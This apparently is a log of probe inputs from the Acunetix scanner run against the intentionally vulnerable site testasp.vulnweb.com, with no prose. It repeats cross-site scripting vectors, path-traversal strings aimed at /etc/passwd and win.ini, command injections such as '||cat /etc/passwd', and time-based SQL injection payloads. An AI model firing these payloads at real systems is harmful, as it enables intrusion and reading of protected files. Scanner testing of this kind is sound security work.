http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<img/src=">" onerror=alert(979193)>

"|"ld

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

Y1jSgDaG'

1

testasp.vulnweb.com

!(()&&!|*|*|

1<ScRiPt%20>prompt(924727)</sCripT>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

/etc/passwd

'

1

1

GtYrOavP')

'"()

'

^(#$!@#$)(()))******

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

1&lt

1

"

1

1

08gj5XdN'))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

\xf6<img acu onmouseover=prompt(980456) //\xf6>

${@print(md5(acunetix_wvs_security_test))}

1

||cat /etc/passwd

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

1

1

&dir

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1<input autofocus onfocus=prompt(997092)>

1

1

http://hit5gIp8ByPSz.bxss.me/

-1)

1

1

'&dir&'

1

<a href='http://www.acunetix.com'>website security</a>

file:///etc/passwd

comments

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

comments

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

[url=http://www.acunetix.com]website security[/url]

1

"&dir&"

1

MW9V3w7p'

1

'"

1

comments/.

WEB-INF/web.xml

1_4Uzks <ScRiPt >prompt(907071)</ScRiPt>

1

|dir

sF0VnUnj')

1'"()&%<ScRiPt >prompt(945893)</ScRiPt>

1

1

<!--

'"()&%<ScRiPt >prompt(973769)</ScRiPt>

1

'|dir

FWvvK90I'))

1

WEB-INF\web.xml

1

1

1

1_903592

1

1

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

1

1

1

acu2554\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2554

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

acux8497\xc0\xbez1\xc0\xbcz2a\x90bcxuca8497

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(905010)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(981991)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(987674)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?934174></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(963788)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(917743)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948878)"></g></svg>

1

1

response.write(9485419*9350491)

1

WEB-INF/web.xml

1<div style=width:expression(prompt(972124))>

1

1

WEB-INF\web.xml

1

&cat /etc/passwd&

1

'+response.write(9485419*9350491)+'

1

1

1<iframe src='data:text/html

1

"+response.write(9485419*9350491)+"

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1<body onload=prompt(986390)>

1

1

../../../../../../../../../../etc/passwd

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(936115)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1<img src=xyz OnErRor=prompt(903641)>

SomeCustomInjectedHeader:injected_by_wvs

1

-1

`cat /etc/passwd`

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1<img/src=">" onerror=alert(905455)>

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99691+99093}

|cat /etc/passwd#

1

-1))

1

1<ScRiPt%20>prompt(922261)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n977630=v976849

'|'ld

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

rt79DkgI'

)

1some_inexistent_file_with_long_name%00.jpg

1

1&lt

"|"ld

1

vilCgZOs')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(965428) //\xf6>

1

/etc/passwd

BivCBRdz'))

testasp.vulnweb.com

^(#$!@#$)(()))******

'"()

'

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

1

1<input autofocus onfocus=prompt(925443)>

1

"

1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

||cat /etc/passwd

[url=http://www.acunetix.com]website security[/url]

-1))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

http://hitAD4Uml9vFy.bxss.me/

&dir

comments

1_LlLKU <ScRiPt >prompt(924776)</ScRiPt>

${@print(md5(acunetix_wvs_security_test))}\

1

jNOfUlmW'

1

1

1

'&dir&'

1

tgcGDLHu')

1

1

1

comments

1

http://www.acunetix.tst

file:///etc/passwd

"&dir&"

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Vgg40Bu0'))

1

1

1

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

1

1

'"

1

1'"()&%<ScRiPt >prompt(909829)</ScRiPt>

'|dir

1

WEB-INF/web.xml

1

"|dir

<!--

'"()&%<ScRiPt >prompt(946260)</ScRiPt>

1

1

1

1

WEB-INF\web.xml

1

1

1_919950

../../../../../../../../../../windows/win.ini

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

1

acu7059\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7059

1

../../../../../../../../../../windows/win.ini.jpg

acux9653\xc0\xbez1\xc0\xbcz2a\x90bcxuca9653

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(957342)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(944270)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(986223)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?933991></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(984589)</ScRiPt>

1

1

response.write(9297659*9452733)

1

1<video><source onerror="javascript:prompt(985239)">

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9297659*9452733)+'

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919757)"></g></svg>

WEB-INF\web.xml

"+response.write(9297659*9452733)+"

'&cat /etc/passwd&'

1

1

1<div style=width:expression(prompt(965978))>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<body onload=prompt(970395)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

`cat /etc/passwd`

${99692+99571}

-1

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921190)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

1

1

1<img src=xyz OnErRor=prompt(988098)>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n914215=v913384

-1)

1

1

'|'ld

)

1some_inexistent_file_with_long_name%00.jpg

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img/src=">" onerror=alert(981606)>

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

!(()&&!|*|*|

1

1

rNeCqHpB'

1<ScRiPt%20>prompt(962657)</sCripT>

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

testasp.vulnweb.com

o4dTbJNY')

1

^(#$!@#$)(()))******

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1&lt

YyiufzP5'))

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

-1

\xf6<img acu onmouseover=prompt(975518) //\xf6>

"

/etc/passwd

1

1

1

1

1

"

-1)

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1<input autofocus onfocus=prompt(925775)>

1

1

||cat /etc/passwd

-1))

1

http://hitashSHjc5Cj.bxss.me/

acunetix_wvs_invalid_filename

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<a href='http://www.acunetix.com'>website security</a>

1

${@print(md5(acunetix_wvs_security_test))}\

IaGH7TGJ'

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

1

[url=http://www.acunetix.com]website security[/url]

qQ9RNJsH')

1

'&dir&'

http://www.acunetix.tst

1

'"

1_aMNDA <ScRiPt >prompt(932498)</ScRiPt>

1

comments

HvHEHYVb'))

1'"()&%<ScRiPt >prompt(955961)</ScRiPt>

1

"&dir&"

<!--

1

1

1

1

file:///etc/passwd

comments/.

'"()&%<ScRiPt >prompt(936709)</ScRiPt>

|dir

1

1

1

1_904411

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

1

1

1

"|dir

1

WEB-INF/web.xml

1

acu3682\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3682

1

1

1

1

1

WEB-INF\web.xml

1

acux8383\xc0\xbez1\xc0\xbcz2a\x90bcxuca8383

1

1

1

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(912612)</ScRiPt>

1

1

1

1

1<script>prompt(900361)</script>

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(977330)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?909810></ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

1<ScRiPt >prompt(901403)</ScRiPt>

1

1

1

1<video><source onerror="javascript:prompt(968771)">

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(925546)"></g></svg>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(979567))>

1

1

1<iframe src='data:text/html

response.write(9338498*9450318)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

1

1

'+response.write(9338498*9450318)+'

1<body onload=prompt(935218)>

1

'&cat /etc/passwd&'

1

1

"+response.write(9338498*9450318)+"

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF/web.xml

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966774)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(923747)>

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

1<img/src=">" onerror=alert(952472)>

1

../../../../../../../../../../etc/passwd.jpg

1

${100236+100017}

`cat /etc/passwd`

-1

1<ScRiPt%20>prompt(925332)</sCripT>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n932071=v918914

-1)

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&lt

-1))

1

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

rilAIc7H'

\xf6<img acu onmouseover=prompt(961903) //\xf6>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

!(()&&!|*|*|

OyzKdDSB')

1

'"()

testasp.vulnweb.com

'

1<input autofocus onfocus=prompt(981766)>

^(#$!@#$)(()))******

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

"

iTQaWGBM'))

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'

1

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

1

-1

1

[url=http://www.acunetix.com]website security[/url]

1

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitMQ2sunNRSq.bxss.me/

-1)

acunetix_wvs_invalid_filename

||cat /etc/passwd

1

1_OaWaG <ScRiPt >prompt(954938)</ScRiPt>

1

1

&dir

-1))

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

euFpgqOW'

http://www.acunetix.tst

1

1

1

'"

"&dir&"

1

dyzDIHEs')

comments/.

1

1

9zQTEawO'))

<!--

1

1

|dir

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(991085)</ScRiPt>

1

1

1

1

'|dir

1

1

'"()&%<ScRiPt >prompt(961817)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

1

"|dir

1

1

1_981025

1

1

WEB-INF/web.xml

1

1

1

1

1

1

WEB-INF\web.xml

1

acu2587\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2587

1

1

1

../../../../../../../../../../windows/win.ini

acux6943\xc0\xbez1\xc0\xbcz2a\x90bcxuca6943

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(961551)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(915136)</script>

1

1

1

1<ScRiPt >prompt(975405)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978714></ScRiPt>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(914271)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(994402)">

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

response.write(9175274*9379466)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(955983)"></g></svg>

1

1

1<div style=width:expression(prompt(954907))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

&cat /etc/passwd&

'+response.write(9175274*9379466)+'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

"+response.write(9175274*9379466)+"

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<body onload=prompt(901427)>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991191)>

1

1

cat /etc/passwd

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img src=xyz OnErRor=prompt(925256)>

WEB-INF\web.xml

-1

1

${99579+99426}

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1<img/src=">" onerror=alert(967014)>

1

1

1

-1)

1

1&n947246=v996794

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt%20>prompt(918444)</sCripT>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

-1))

1

1

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&lt

1

!(()&&!|*|*|

'"()

rukIGQaG'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/xss.html?%00.jpg

\xf6<img acu onmouseover=prompt(919783) //\xf6>

testasp.vulnweb.com

"|"ld

^(#$!@#$)(()))******

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

u5V9uH7G')

'

1

1

1

1<input autofocus onfocus=prompt(933256)>

agbLXeHw'))

"

1

1

/etc/passwd

http://hitIq6OAaWVRS.bxss.me/

'

<a href='http://www.acunetix.com'>website security</a>

1

1

-1

${@print(md5(acunetix_wvs_security_test))}

"

acunetix_wvs_invalid_filename

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

-1)

1

1

||cat /etc/passwd

1

1_99VrI <ScRiPt >prompt(994455)</ScRiPt>

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

t3LIZbhY'

1

1

'&dir&'

http://www.acunetix.tst

comments/.

1

1

Yw0Unbdo')

1

1

"&dir&"

'"

1

1

1

eqk69R5o'))

1'"()&%<ScRiPt >prompt(982117)</ScRiPt>

file:///etc/passwd

1

<!--

|dir

'"()&%<ScRiPt >prompt(927055)</ScRiPt>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1

1

1_952512

WEB-INF/web.xml

1

1

"|dir

1

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

acu9491\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9491

1

1

1

../../../../../../../../../../boot.ini

1

acux2447\xc0\xbez1\xc0\xbcz2a\x90bcxuca2447

1

1

1<ScRiPt >prompt(906344)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(906667)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<ScRiPt >prompt(955700)</ScRiPt>

1

................windowswin.ini

1

response.write(9031493*9934243)

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?985817></ScRiPt>

1

1

'+response.write(9031493*9934243)+'

1<ScRiPt >prompt(914702)</ScRiPt>

1

1

"+response.write(9031493*9934243)+"

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1<video><source onerror="javascript:prompt(940451)">

../../../../../../../../../../etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(996436)"></g></svg>

1

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<div style=width:expression(prompt(964207))>

../../../../../../../../../../etc/passwd.jpg

"&cat /etc/passwd&"

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100177+99074}

1

WEB-INF/web.xml

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

cat /etc/passwd

1

1<iframe src='data:text/html

-1

WEB-INF\web.xml

1

1

1some_inexistent_file_with_long_name%00.jpg

1

-1)

1<body onload=prompt(923215)>

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&n977676=v971477

1

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

|cat /etc/passwd#

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946576)>

1

)

1

pDhPiQXJ'

1

testasp.vulnweb.com

1

1

1<img src=xyz OnErRor=prompt(972749)>

'|'ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

jjOucx85')

1

!(()&&!|*|*|

1

1

"|"ld

1<img/src=">" onerror=alert(969526)>

1

/etc/passwd

'"()

^(#$!@#$)(()))******

1

MwQyVrUQ'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<ScRiPt%20>prompt(978902)</sCripT>

-1

1

'

1

1

'

1&lt

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

1

"

\xf6<img acu onmouseover=prompt(966106) //\xf6>

http://hiteLDPph6Vtk.bxss.me/

-1))

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1<input autofocus onfocus=prompt(969748)>

||cat /etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

eXlP6LWU'

1

acunetix_wvs_invalid_filename

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

&dir

1

[url=http://www.acunetix.com]website security[/url]

http://www.acunetix.tst

file:///etc/passwd

comments

06UX5nlW')

1

'&dir&'

'"

1

1

1_tEJVY <ScRiPt >prompt(902573)</ScRiPt>

n3dZFDzJ'))

comments

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1

<!--

"&dir&"

1'"()&%<ScRiPt >prompt(961261)</ScRiPt>

WEB-INF/web.xml

comments/.

1

1

'"()&%<ScRiPt >prompt(919712)</ScRiPt>

1

1

1

|dir

1

1

WEB-INF\web.xml

1_918355

1

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

acu4669\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4669

1

1

../../../../../../../../../../boot.ini

1

1

acux2290\xc0\xbez1\xc0\xbcz2a\x90bcxuca2290

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(997161)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(942398)</script>

................windowswin.ini

1

1

1

1<ScRiPt >prompt(933263)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?958674></ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(945393)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<video><source onerror="javascript:prompt(902990)">

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(959768)"></g></svg>

1

1

1<div style=width:expression(prompt(928524))>

1

WEB-INF/web.xml

1

1

1<iframe src='data:text/html

1

WEB-INF\web.xml

1<body onload=prompt(963932)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(926627)>

1

1

1

1<img src=xyz OnErRor=prompt(936584)>

response.write(9846843*9216045)

1<img/src=">" onerror=alert(962452)>

1

1

1

1

'+response.write(9846843*9216045)+'

1<ScRiPt%20>prompt(929837)</sCripT>

1

1

1

1

&cat /etc/passwd&

"+response.write(9846843*9216045)+"

1&lt

1

1

1

'&cat /etc/passwd&'

1

1

if(now()=sysdate(),sleep(3.844),0)/*'XOR(if(now()=sysdate(),sleep(3.844),0))OR'"XOR(if(now()=sysdate(),sleep(3.844),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

\xf6<img acu onmouseover=prompt(948482) //\xf6>

1

1

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

(select(0)from(select(sleep(3.844)))v)/*'+(select(0)from(select(sleep(3.844)))v)+'"+(select(0)from(select(sleep(3.844)))v)+"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<input autofocus onfocus=prompt(965678)>

cat /etc/passwd

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99275+99177}

<a href='http://www.acunetix.com'>website security</a>
